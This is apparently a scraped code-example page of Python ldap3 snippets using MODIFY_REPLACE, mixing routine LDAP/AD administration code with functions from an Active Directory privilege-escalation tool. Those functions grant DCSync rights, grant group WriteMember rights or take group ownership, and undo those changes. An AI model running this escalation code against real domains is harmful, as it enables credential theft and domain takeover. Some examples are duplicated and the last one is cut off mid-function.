示例1: _create_ldap_modify_changes
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
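def _create_ldap_modify_changes(self, attributes, uid):
    """
    Build the ldap3 change dictionary needed to update a user's attributes.

    For every requested attribute the current user info is consulted to
    decide whether the value has to be replaced (attribute already present),
    added (attribute absent) or removed (empty/None value requested).

    :param attributes: Attributes to be updated
    :type attributes: dict
    :param uid: The uid of the user object in the resolver
    :type uid: basestring
    :return: dict with attribute name as keys and ``[operation, [value]]``
        lists as values, ready for ``ldap3.Connection.modify``
    """
    modify_changes = {}
    uinfo = self.getUserInfo(uid)
    for fieldname, value in attributes.items():
        present = fieldname in uinfo
        if value:
            operation = MODIFY_REPLACE if present else MODIFY_ADD
            modify_changes[fieldname] = [operation, [value]]
        elif present:
            # An empty value means "remove". Only request the delete when the
            # attribute actually exists: deleting an absent attribute makes the
            # server answer noSuchAttribute and reject the whole modify.
            modify_changes[fieldname] = [MODIFY_DELETE, [value]]
    return modify_changes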
示例2: installRadius
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
def installRadius():
    """
    Render the Gluu Radius LDIF template, install the Radius service and
    switch on the LDAP configuration flags that enable it.

    Works entirely through the module-level ``setupObj``, ``ces_dir`` and
    ``ldap_conn`` objects; every step is a side effect (filesystem, process
    execution, LDAP writes) and nothing is returned.
    """
    template_dir = os.path.join(setupObj.staticFolder, 'radius', 'templates')
    ldif_template = os.path.join(template_dir, 'gluu_radius_server.ldif')
    output_dir = os.path.join(ces_dir, 'output')
    setupObj.renderTemplateInOut(os.path.join(ldif_template), template_dir, output_dir)

    setupObj.install_gluu_radius()

    # The Radius private key is owned by radius:gluu with mode 660, so the
    # service can read it while it stays unreadable to other local users.
    private_key = os.path.join(setupObj.certFolder, 'gluu-radius.private-key.pem')
    setupObj.run([setupObj.cmd_chown, 'radius:gluu', private_key])
    setupObj.run([setupObj.cmd_chmod, '660', private_key])

    # Turn on backward-compatible OpenID scopes and legacy id_token claims in
    # the dynamic oxAuth configuration and write it back as JSON.
    dn, oxauth_conf = get_oxAuthConfiguration_ldap()
    oxauth_conf['openidScopeBackwardCompatibility'] = True
    oxauth_conf['legacyIdTokenClaims'] = True
    oxauth_conf_json = json.dumps(oxauth_conf, indent=2)

    ldap_writes = (
        (dn, {"oxAuthConfDynamic": [ldap3.MODIFY_REPLACE, oxauth_conf_json]}),
        ('ou=configuration,o=gluu', {"gluuRadiusEnabled": [ldap3.MODIFY_REPLACE, 'true']}),
        ('inum=B8FD-4C11,ou=scripts,o=gluu', {"oxEnabled": [ldap3.MODIFY_REPLACE, 'true']}),
    )
    for target_dn, changes in ldap_writes:
        ldap_conn.modify(target_dn, changes)
示例3: change_password
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
def change_password(self, uid, password_hash):
    """
    Replace the ``userPassword`` attribute of the user entry ``uid``.

    ``password_hash`` is stored verbatim behind the ``{CRYPT}`` scheme prefix,
    i.e. it must already be a hash, never a clear-text password.

    NOTE(review): ``uid`` is interpolated into the DN without escaping, so it
    is assumed to be a validated identifier rather than raw user input —
    confirm at the call site.
    """
    entry_dn = ",".join([f"uid={uid}", self.user_base])
    stored_value = "{CRYPT}" + password_hash
    self.connection.modify(entry_dn, {"userPassword": [(MODIFY_REPLACE, [stored_value])]})
示例4: update_group_members
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
def update_group_members(self, cn, members):
    """
    Make ``memberUid`` of group ``cn`` equal to exactly ``members``.

    A non-empty ``members`` list replaces the whole attribute; an empty one
    issues MODIFY_DELETE with no values, which drops the attribute so no
    stale membership survives.
    """
    group_dn = ",".join([f"cn={cn}", self.group_base])
    if not members:
        changes = {"memberUid": [(MODIFY_DELETE, [])]}
    else:
        changes = {"memberUid": [(MODIFY_REPLACE, members)]}
    self.connection.modify(group_dn, changes)
示例5: remove_addmember_privs
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
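def remove_addmember_privs(ldapconnection, data):
    """
    Undo a previous WriteMember (AddMember) grant on a group's DACL.

    ``data`` is the restore record written by the corresponding add
    operation: ``target_dn``, ``target_sid`` and the hex-encoded security
    descriptors ``old_sd`` (before the grant) and ``new_sd`` (after it).

    Returns True when the right is no longer present (nothing to do, or the
    restore succeeded); raises RestoreException otherwise.
    """
    # Set SD flags to only query for DACL
    controls = security_descriptor_control(sdflags=0x04)
    usersid = data['target_sid']
    ldapconnection.search(data['target_dn'], '(objectClass=*)', search_scope=BASE, attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
    # An empty result (object gone, or the bind cannot read the DACL) would
    # otherwise surface as a bare IndexError with no context.
    if not ldapconnection.entries:
        raise RestoreException('Could not read %s, unable to restore: %s' % (data['target_dn'], str(ldapconnection.result)))
    entry = ldapconnection.entries[0]
    secDescData = entry['nTSecurityDescriptor'].raw_values[0]
    secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)
    old_sd = binascii.unhexlify(data['old_sd'])
    if secDescData == old_sd:
        print_m('%s security descriptor is identical to before operation, skipping' % data['target_dn'])
        return True
    new_sd = binascii.unhexlify(data['new_sd'])
    if secDescData != new_sd:
        # The DACL changed again after our modification, so only the ACE we
        # added (write-property on the Member attribute) is stripped out and
        # any other edits are left in place.
        accesstype = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_WRITE_PROP
        if RestoreOperation.dacl_remove_ace(secDesc, 'bf9679c0-0de6-11d0-a285-00aa003049e2', usersid, accesstype):
            print_m('Removing ACE using manual approach')
            replace_sd = secDesc.getData()
        else:
            raise RestoreException('%s security descriptor does not contain the modified ACE. The access may already be restored.' % data['target_dn'])
    else:
        # We can simply restore the old SD since the current SD is identical to the one after our modification
        print_m('Removing ACE using SD restore approach')
        replace_sd = old_sd
    res = ldapconnection.modify(data['target_dn'], {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [replace_sd])}, controls=controls)
    if res:
        print_o('AddMember privileges restored successfully')
        return True
    raise RestoreException('Failed to restore WriteMember privs on group %s: %s' % (data['target_dn'], str(ldapconnection.result)))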
示例6: remove_domain_sync
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
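def remove_domain_sync(ldapconnection, data):
    """
    Undo a previous grant of the get-changes / get-changes-all extended
    rights on the domain object's DACL.

    ``data`` is the restore record written by add_domain_sync: ``target_dn``,
    ``target_sid`` and the hex-encoded security descriptors ``old_sd``
    (before the grant) and ``new_sd`` (as stored after the grant).

    Returns True when nothing had to be done or the restore succeeded;
    raises RestoreException otherwise.
    """
    # Set SD flags to only query for DACL
    controls = security_descriptor_control(sdflags=0x04)
    usersid = data['target_sid']
    ldapconnection.search(data['target_dn'], '(objectClass=*)', search_scope=BASE, attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
    # An empty result (object gone, or the bind cannot read the DACL) would
    # otherwise surface as a bare IndexError with no context.
    if not ldapconnection.entries:
        raise RestoreException('Could not read %s, unable to restore: %s' % (data['target_dn'], str(ldapconnection.result)))
    entry = ldapconnection.entries[0]
    secDescData = entry['nTSecurityDescriptor'].raw_values[0]
    secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)
    old_sd = binascii.unhexlify(data['old_sd'])
    if secDescData == old_sd:
        print_m('%s security descriptor is identical to before operation, skipping' % data['target_dn'])
        return True
    new_sd = binascii.unhexlify(data['new_sd'])
    if secDescData != new_sd:
        # The DACL changed again after our modification, so only the two ACEs
        # we added are removed; both must be found for this to count.
        accesstype = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CONTROL_ACCESS
        # these are the GUIDs of the get-changes and get-changes-all extended attributes
        if (RestoreOperation.dacl_remove_ace(secDesc, '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', usersid, accesstype) and
                RestoreOperation.dacl_remove_ace(secDesc, '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', usersid, accesstype)):
            print_m('Removing ACE using manual approach')
            replace_sd = secDesc.getData()
        else:
            raise RestoreException('%s security descriptor does not contain the modified ACE. The access may already be restored.' % data['target_dn'])
    else:
        # We can simply restore the old SD since the current SD is identical to the one after our modification
        print_m('Removing ACE using SD restore approach')
        replace_sd = old_sd
    res = ldapconnection.modify(data['target_dn'], {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [replace_sd])}, controls=controls)
    if res:
        print_o('Domain Sync privileges restored successfully')
        return True
    raise RestoreException('Failed to restore Domain sync privs on domain %s: %s' % (data['target_dn'], str(ldapconnection.result)))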
示例7: remove_addmember_privs
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
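def remove_addmember_privs(ldapconnection, data):
    """
    Undo a previous WriteMember (AddMember) grant on a group's DACL.

    ``data`` is the restore record written by the corresponding add
    operation: ``target_dn``, ``target_sid`` and the hex-encoded security
    descriptors ``old_sd`` (before the grant) and ``new_sd`` (after it).

    Returns True when the right is no longer present (nothing to do, or the
    restore succeeded); raises RestoreException otherwise.
    """
    # Set SD flags to only query for DACL
    controls = security_descriptor_control(sdflags=0x04)
    usersid = data['target_sid']
    ldapconnection.search(data['target_dn'], '(objectClass=*)', search_scope=BASE, attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
    # An empty result (object gone, or the bind cannot read the DACL) would
    # otherwise surface as a bare IndexError with no context.
    if not ldapconnection.entries:
        raise RestoreException('Could not read %s, unable to restore: %s' % (data['target_dn'], str(ldapconnection.result)))
    entry = ldapconnection.entries[0]
    secDescData = entry['nTSecurityDescriptor'].raw_values[0]
    secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)
    old_sd = binascii.unhexlify(data['old_sd'])
    if secDescData == old_sd:
        print_m('%s security descriptor is identical to before operation, skipping' % data['target_dn'])
        return True
    new_sd = binascii.unhexlify(data['new_sd'])
    if secDescData != new_sd:
        # The DACL changed again after our modification, so only the ACE we
        # added (write-property on the Member attribute) is stripped out and
        # any other edits are left in place.
        accesstype = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_WRITE_PROP
        if RestoreOperation.dacl_remove_ace(secDesc, 'bf9679c0-0de6-11d0-a285-00aa003049e2', usersid, accesstype):
            print_m('Removing ACE using manual approach')
            replace_sd = secDesc.getData()
        else:
            raise RestoreException('%s security descriptor does not contain the modified ACE. The access may already be restored.' % data['target_dn'])
    else:
        # We can simply restore the old SD since the current SD is identical to the one after our modification
        print_i('Removing ACE using SD restore approach')
        replace_sd = old_sd
    res = ldapconnection.modify(data['target_dn'], {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [replace_sd])}, controls=controls)
    if res:
        print_o('AddMember privileges restored successfully')
        return True
    raise RestoreException('Failed to restore WriteMember privs on group %s: %s' % (data['target_dn'], str(ldapconnection.result)))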
示例8: remove_domain_sync
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
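def remove_domain_sync(ldapconnection, data):
    """
    Undo a previous grant of the get-changes / get-changes-all extended
    rights on the domain object's DACL.

    ``data`` is the restore record written by add_domain_sync: ``target_dn``,
    ``target_sid`` and the hex-encoded security descriptors ``old_sd``
    (before the grant) and ``new_sd`` (as stored after the grant).

    Returns True when nothing had to be done or the restore succeeded;
    raises RestoreException otherwise.
    """
    # Set SD flags to only query for DACL
    controls = security_descriptor_control(sdflags=0x04)
    usersid = data['target_sid']
    ldapconnection.search(data['target_dn'], '(objectClass=*)', search_scope=BASE, attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
    # An empty result (object gone, or the bind cannot read the DACL) would
    # otherwise surface as a bare IndexError with no context.
    if not ldapconnection.entries:
        raise RestoreException('Could not read %s, unable to restore: %s' % (data['target_dn'], str(ldapconnection.result)))
    entry = ldapconnection.entries[0]
    secDescData = entry['nTSecurityDescriptor'].raw_values[0]
    secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)
    old_sd = binascii.unhexlify(data['old_sd'])
    if secDescData == old_sd:
        print_m('%s security descriptor is identical to before operation, skipping' % data['target_dn'])
        return True
    new_sd = binascii.unhexlify(data['new_sd'])
    if secDescData != new_sd:
        # The DACL changed again after our modification, so only the two ACEs
        # we added are removed; both must be found for this to count.
        accesstype = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CONTROL_ACCESS
        # these are the GUIDs of the get-changes and get-changes-all extended attributes
        if (RestoreOperation.dacl_remove_ace(secDesc, '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', usersid, accesstype) and
                RestoreOperation.dacl_remove_ace(secDesc, '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', usersid, accesstype)):
            print_m('Removing ACE using manual approach')
            replace_sd = secDesc.getData()
        else:
            raise RestoreException('%s security descriptor does not contain the modified ACE. The access may already be restored.' % data['target_dn'])
    else:
        # We can simply restore the old SD since the current SD is identical to the one after our modification
        print_i('Removing ACE using SD restore approach')
        replace_sd = old_sd
    res = ldapconnection.modify(data['target_dn'], {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [replace_sd])}, controls=controls)
    if res:
        print_o('Domain Sync privileges restored successfully')
        return True
    raise RestoreException('Failed to restore Domain sync privs on domain %s: %s' % (data['target_dn'], str(ldapconnection.result)))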
示例9: remove_owner
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
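def remove_owner(ldapconnection, data):
    """
    Put the previous owner back on an object's security descriptor.

    ``data`` is the restore record written by write_owner: ``target_dn`` and
    ``old_owner_sid`` (canonical SID string of the owner before the change).

    Returns True when the owner already is the old one, when the restore
    succeeds, or when the server refuses the change with LDAP result 19
    (constraintViolation) — a known limitation that is reported and has to
    be fixed by hand. Raises RestoreException on any other failure.
    """
    # Set SD flags to only query for owner
    controls = security_descriptor_control(sdflags=0x01)
    usersid = data['old_owner_sid']
    ldapconnection.search(data['target_dn'], '(objectClass=*)', search_scope=BASE, attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
    # An empty result (object gone, or the bind cannot read the owner) would
    # otherwise surface as a bare IndexError with no context.
    if not ldapconnection.entries:
        raise RestoreException('Could not read %s, unable to restore owner: %s' % (data['target_dn'], str(ldapconnection.result)))
    entry = ldapconnection.entries[0]
    secDescData = entry['nTSecurityDescriptor'].raw_values[0]
    secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)
    if secDesc['OwnerSid'].formatCanonical() == usersid:
        print_m('%s is owned by the same user as before exploitation, skipping' % data['target_dn'])
        return True
    secDesc['OwnerSid'] = LDAP_SID()
    secDesc['OwnerSid'].fromCanonical(usersid)
    secdesc_data = secDesc.getData()
    res = ldapconnection.modify(data['target_dn'], {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [secdesc_data])}, controls=controls)
    if res:
        print_o('Owner restore succesful')
        return True
    # Result 19 (constraintViolation) means the server will not accept this
    # SID as owner. TODO: investigate why this is and possible workarounds
    if ldapconnection.result['result'] == 19:
        print_f('Failed to change owner of group %s to %s. This is a known limitation, please restore the owner manually.' % (data['target_dn'], usersid))
        # Treat this as a success
        return True
    raise RestoreException('Failed to change owner of group %s to %s: %s' % (data['target_dn'], usersid, str(ldapconnection.result)))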
示例10: run
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
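def run(self, params=None):
    """
    Enable the AD account named by ``params['distinguished_name']``.

    The DN is normalised and escaped for use in a search filter, the object's
    ``userAccountControl`` is read, the ACCOUNTDISABLE bit (0x2) is cleared
    and the value is written back with MODIFY_REPLACE.

    :param params: plugin input; only ``distinguished_name`` is used
    :return: ``{'success': True}`` when the modify reports LDAP result 0,
        otherwise ``{'success': False}`` after logging the server's description
    :raises PluginException: when no object has that DN, or the object has
        no ``userAccountControl`` attribute (is not a user)
    """
    params = params or {}
    conn = self.connection.conn
    dn = ADUtils.dn_normalize(params.get('distinguished_name'))
    rdn_parts = ADUtils.dn_escape_and_split(dn)
    # The DC components alone form the search base; the full escaped DN is
    # matched against distinguishedName in the filter.
    search_base = ','.join(part for part in rdn_parts if 'DC' in part)
    escaped_dn = ','.join(rdn_parts)
    pairs = ADUtils.find_parentheses_pairs(escaped_dn)
    # Parentheses with no '=' between them belong to a name, not to filter
    # grouping, so they are rewritten as \28 / \29. The closing paren is
    # replaced first so the opening index is still valid for this pair.
    # NOTE(review): indices of later pairs are not shifted after an earlier
    # replacement grows the string — confirm find_parentheses_pairs ordering.
    if pairs:
        for open_idx, close_idx in pairs.items():
            if escaped_dn.find('=', open_idx, close_idx) == -1:
                escaped_dn = escaped_dn[:close_idx] + '\\29' + escaped_dn[close_idx + 1:]
                escaped_dn = escaped_dn[:open_idx] + '\\28' + escaped_dn[open_idx + 1:]
    self.logger.info(escaped_dn)
    conn.search(search_base=search_base,
                search_filter=f'(distinguishedName={escaped_dn})',
                attributes=['userAccountControl'])
    results = conn.response
    if not any('dn' in d for d in results):
        self.logger.error('The DN ' + dn + ' was not found')
        raise PluginException(cause='The DN was not found',
                              assistance='The DN ' + dn + ' was not found')
    attribute_sets = [d["attributes"] for d in results if "attributes" in d]
    try:
        account_status = attribute_sets[0]['userAccountControl']
    except (IndexError, KeyError) as ex:
        # Only "no attributes" / "no userAccountControl" mean "not a user";
        # any other exception is a real error and must surface unchanged.
        self.logger.error('The DN ' + dn + ' is not a user')
        raise PluginException(cause='The DN is not a user',
                              assistance='The DN ' + dn + ' is not a user') from ex
    account_disable_flag = 0x2  # ACCOUNTDISABLE bit of userAccountControl
    account_status &= ~account_disable_flag
    conn.modify(escaped_dn, {'userAccountControl': [(MODIFY_REPLACE, [account_status])]})
    result = conn.result
    if result['result'] == 0:
        return {'success': True}
    self.logger.error('failed: error message %s' % result['description'])
    return {'success': False}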
示例11: run
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
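def run(self, params=None):
    """
    Create an AD user object, set its password and apply the requested
    enabled/disabled state.

    Reads from ``params``: domain_name, first_name, last_name, logon_name,
    user_ou, account_disabled, password, additional_parameters and
    user_principal_name.

    :return: ``{'success': <bool>}`` where the bool is the outcome of the
        password change (``extend.ad_modify_password``); the add and the
        userAccountControl modify are only logged via ``conn.result``
    """
    params = params or {}
    conn = self.connection.conn
    ssl = self.connection.ssl
    domain_name = params.get('domain_name')
    first_name = params.get('first_name')
    last_name = params.get('last_name')
    logon_name = params.get('logon_name')
    user_ou = params.get('user_ou')
    account_disabled = params.get('account_disabled')
    password = params.get('password')
    additional_parameters = params.get('additional_parameters')
    user_principal_name = params.get('user_principal_name')

    # userAccountControl 512 = NORMAL_ACCOUNT, 514 = NORMAL_ACCOUNT | ACCOUNTDISABLE.
    # A real boolean is honoured as well as the string 'true', so a request
    # for a disabled account can never silently produce an enabled one.
    if account_disabled is True or account_disabled == 'true':
        user_account_control = 514
    else:
        user_account_control = 512

    full_name = first_name + ' ' + last_name
    domain_dn = domain_name.replace('.', ',DC=')
    if user_ou == "Users":
        # The default Users container is a CN, not an OU.
        dn = 'CN={},CN={},DC={}'.format(full_name, user_ou, domain_dn)
    else:
        # Nested OUs arrive comma-separated; expand to OU=a,OU=b.
        user_ou = user_ou.replace(',', ',OU=')
        dn = 'CN={},OU={},DC={}'.format(full_name, user_ou, domain_dn)
    self.logger.info("User DN=" + dn)
    if ssl is False:
        self.logger.info('Warning SSL is not enabled. User password can not be set. User account will be disabled')

    parameters = {'givenName': first_name, 'sn': last_name, 'sAMAccountName': logon_name,
                  'userPrincipalName': user_principal_name}
    parameters.update(additional_parameters or {})
    # The password is never sent as a plain userPassword attribute (one
    # smuggled in via additional_parameters is dropped too): it is set through
    # extend.ad_modify_password below, and so it is also never logged.
    parameters.pop("userPassword", None)
    self.logger.info(parameters)

    conn.add(dn, ['person', 'user'], parameters)
    self.logger.info(conn.result)
    pass_set = extend.ad_modify_password(conn, dn, password, None)
    conn.modify(dn, {'userAccountControl': (MODIFY_REPLACE, [user_account_control])})
    self.logger.info(conn.result)
    return {'success': pass_set}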
示例12: run
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
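def run(self, params=None):
    """
    Disable the AD account named by ``params['distinguished_name']``.

    The DN is normalised and escaped for use in a search filter, the object's
    ``userAccountControl`` is read, the ACCOUNTDISABLE bit (0x2) is set and
    the value is written back with MODIFY_REPLACE.

    :param params: plugin input; only ``distinguished_name`` is used
    :return: ``{'success': True}`` when the modify reports LDAP result 0,
        otherwise ``{'success': False}`` after logging the server's description
    :raises PluginException: when no object has that DN, or the object has
        no ``userAccountControl`` attribute (is not a user)
    """
    params = params or {}
    conn = self.connection.conn
    dn = ADUtils.dn_normalize(params.get('distinguished_name'))
    rdn_parts = ADUtils.dn_escape_and_split(dn)
    # The DC components alone form the search base; the full escaped DN is
    # matched against distinguishedName in the filter.
    search_base = ','.join(part for part in rdn_parts if 'DC' in part)
    escaped_dn = ','.join(rdn_parts)
    pairs = ADUtils.find_parentheses_pairs(escaped_dn)
    self.logger.info(pairs)
    # Parentheses with no '=' between them belong to a name, not to filter
    # grouping, so they are rewritten as \28 / \29. The closing paren is
    # replaced first so the opening index is still valid for this pair.
    # NOTE(review): indices of later pairs are not shifted after an earlier
    # replacement grows the string — confirm find_parentheses_pairs ordering.
    if pairs:
        for open_idx, close_idx in pairs.items():
            if escaped_dn.find('=', open_idx, close_idx) == -1:
                escaped_dn = escaped_dn[:close_idx] + '\\29' + escaped_dn[close_idx + 1:]
                escaped_dn = escaped_dn[:open_idx] + '\\28' + escaped_dn[open_idx + 1:]
    self.logger.info(escaped_dn)
    conn.search(search_base=search_base,
                search_filter=f'(distinguishedName={escaped_dn})',
                attributes=['userAccountControl'])
    results = conn.response
    if not any('dn' in d for d in results):
        self.logger.error('The DN ' + escaped_dn + ' was not found')
        raise PluginException(cause="The DN was not found",
                              assistance="The DN " + escaped_dn + " was not found")
    attribute_sets = [d['attributes'] for d in results if 'attributes' in d]
    try:
        account_status = attribute_sets[0]['userAccountControl']
    except (IndexError, KeyError) as ex:
        # Only "no attributes" / "no userAccountControl" mean "not a user";
        # any other exception is a real error and must surface unchanged.
        self.logger.error('The DN ' + escaped_dn + ' is not a user')
        raise PluginException(cause="The DN is not a user",
                              assistance="The DN " + escaped_dn + " is not a user") from ex
    account_disable_flag = 0x2  # ACCOUNTDISABLE bit of userAccountControl
    account_status |= account_disable_flag
    conn.modify(escaped_dn, {'userAccountControl': [(MODIFY_REPLACE, [account_status])]})
    result = conn.result
    if result['result'] == 0:
        return {'success': True}
    self.logger.error('failed: error message %s' % result['description'])
    return {'success': False}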
示例13: add_domain_sync
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
def add_domain_sync(ldapconnection, state, user_sam, domain_name):
    """
    Append two object ACEs (control-access on the get-changes and
    get-changes-all extended rights) for ``user_sam`` to the domain object's
    DACL and write the descriptor back.

    Before the write the current descriptor is saved hex-encoded in a restore
    record (``old_sd``, ``target_sid``, ``target_dn``; after a successful
    write also ``new_sd`` as re-read from the server). The record is pushed
    to ``state`` with ``push_history`` in both the success and the failure
    branch, and is what the matching restore routine (remove_domain_sync)
    consumes to undo the change.

    Returns True on success; raises ExploitException when the LDAP root is
    not the requested domain or the modify is refused.
    """
    # Query for the sid of our target user
    userdn, usersid = get_object_info(ldapconnection, user_sam)
    # Set SD flags to only query for DACL
    controls = security_descriptor_control(sdflags=0x04)
    # Dictionary for restore data
    restoredata = {}
    # print_m('Querying domain security descriptor')
    ldapconnection.search(get_ldap_root(ldapconnection), '(&(objectCategory=domain))', attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
    # NOTE(review): an empty search result raises a bare IndexError here
    # instead of a descriptive error.
    entry = ldapconnection.entries[0]
    # This shouldn't happen but lets be sure just in case
    if ldap2domain(entry.entry_dn).upper() != domain_name.upper():
        raise ExploitException('Wrong domain! LDAP returned the domain %s but escalation was requested to %s' % (ldap2domain(entry.entry_dn).upper(), domain_name.upper()))
    secDescData = entry['nTSecurityDescriptor'].raw_values[0]
    # Save old SD for restore purposes
    restoredata['old_sd'] = binascii.hexlify(secDescData).decode('utf-8')
    restoredata['target_sid'] = usersid
    secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)
    # We need "control access" here for the extended attribute
    accesstype = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CONTROL_ACCESS
    # these are the GUIDs of the get-changes and get-changes-all extended attributes
    secDesc['Dacl']['Data'].append(create_object_ace('1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', usersid, accesstype))
    secDesc['Dacl']['Data'].append(create_object_ace('1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', usersid, accesstype))
    dn = entry.entry_dn
    restoredata['target_dn'] = dn
    data = secDesc.getData()
    res = ldapconnection.modify(dn, {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [data])}, controls=controls)
    if res:
        print_o('Dacl modification successful')
        # Query the SD again to see what AD made of it
        ldapconnection.search(get_ldap_root(ldapconnection), '(&(objectCategory=domain))', attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
        entry = ldapconnection.entries[0]
        newSD = entry['nTSecurityDescriptor'].raw_values[0]
        # Save this to restore the SD later on; the restore routine compares
        # the live SD against new_sd to decide between a plain SD restore and
        # removing only the added ACEs.
        restoredata['new_sd'] = binascii.hexlify(newSD).decode('utf-8')
        restoredata['success'] = True
        state.push_history('add_domain_sync', restoredata)
        return True
    else:
        # Record the failed attempt too, so the history stays complete.
        restoredata['success'] = False
        state.push_history('add_domain_sync', restoredata)
        raise ExploitException('Failed to add DCSync privs to %s: %s' % (userdn, str(ldapconnection.result)))
示例14: add_addmember_privs
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
def add_addmember_privs(ldapconnection, state, user_sam, group_bh_name):
    """
    Append a write-property object ACE on the Member attribute for
    ``user_sam`` to the DACL of group ``group_bh_name`` and write the
    descriptor back.

    Before the write the current descriptor is saved hex-encoded in a restore
    record (``old_sd``, ``target_sid``, ``target_dn``; after a successful
    write also ``new_sd`` as re-read from the server). The record is pushed
    to ``state`` with ``push_history`` in both branches and is what the
    matching restore routine (remove_addmember_privs) consumes.

    Returns True on success; raises ExploitException when the modify is
    refused.
    """
    # Query for the sid of our target user
    userdn, usersid = get_object_info(ldapconnection, user_sam)
    # Set SD flags to only query for DACL
    controls = security_descriptor_control(sdflags=0x04)
    # Dictionary for restore data
    restoredata = {}
    # print_m('Querying group security descriptor')
    group_sam = get_sam_name(group_bh_name)
    # group_sam is filter-escaped, so a name containing filter metacharacters
    # cannot change the meaning of the search.
    ldapconnection.search(get_ldap_root(ldapconnection), '(sAMAccountName=%s)' % escape_filter_chars(group_sam), attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
    # NOTE(review): an empty search result raises a bare IndexError here
    # instead of a descriptive error.
    entry = ldapconnection.entries[0]
    secDescData = entry['nTSecurityDescriptor'].raw_values[0]
    secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)
    # Save old SD for restore purposes
    restoredata['old_sd'] = binascii.hexlify(secDescData).decode('utf-8')
    restoredata['target_sid'] = usersid
    # We need "write property" here to write to the "member" attribute
    accesstype = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_WRITE_PROP
    # this is the GUID of the Member attribute
    secDesc['Dacl']['Data'].append(create_object_ace('bf9679c0-0de6-11d0-a285-00aa003049e2', usersid, accesstype))
    dn = entry.entry_dn
    restoredata['target_dn'] = dn
    data = secDesc.getData()
    res = ldapconnection.modify(dn, {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [data])}, controls=controls)
    if res:
        print_o('Dacl modification successful')
        # Query the SD again to see what AD made of it
        ldapconnection.search(dn, '(objectClass=*)', search_scope=ldap3.BASE , attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
        entry = ldapconnection.entries[0]
        newSD = entry['nTSecurityDescriptor'].raw_values[0]
        # NOTE(review): newSecDesc is parsed but never used below.
        newSecDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=newSD)
        # Save this to restore the SD later on
        restoredata['new_sd'] = binascii.hexlify(newSD).decode('utf-8')
        restoredata['success'] = True
        state.push_history('add_addmember_privs', restoredata)
        return True
    else:
        # Record the failed attempt too, so the history stays complete.
        restoredata['success'] = False
        state.push_history('add_addmember_privs', restoredata)
        # filter out already exists?
        raise ExploitException('Failed to add WriteMember privs for %s to group %s: %s' % (userdn, dn, str(ldapconnection.result)))
示例15: write_owner
# 需要导入模块: import ldap3 [as 别名]
# 或者: from ldap3 import MODIFY_REPLACE [as 别名]
def write_owner(ldapconnection, state, user_sam, group_bh_name):
    """
    Set the owner SID of group ``group_bh_name``'s security descriptor to
    the SID of ``user_sam`` and write the descriptor back.

    Only the owner part of the descriptor is read and written (sdflags 0x01).
    The previous owner is saved in the restore record as ``old_owner_sid``
    together with ``old_sd``, ``target_sid`` and ``target_dn``; the record is
    pushed to ``state`` with ``push_history`` in both branches and is what
    the matching restore routine (remove_owner) consumes.

    Returns True when the user already owns the group or the change
    succeeded; raises ExploitException when the modify is refused.
    """
    # Query for the sid of our target user
    userdn, usersid = get_object_info(ldapconnection, user_sam)
    # Set SD flags to only query for owner
    controls = security_descriptor_control(sdflags=0x01)
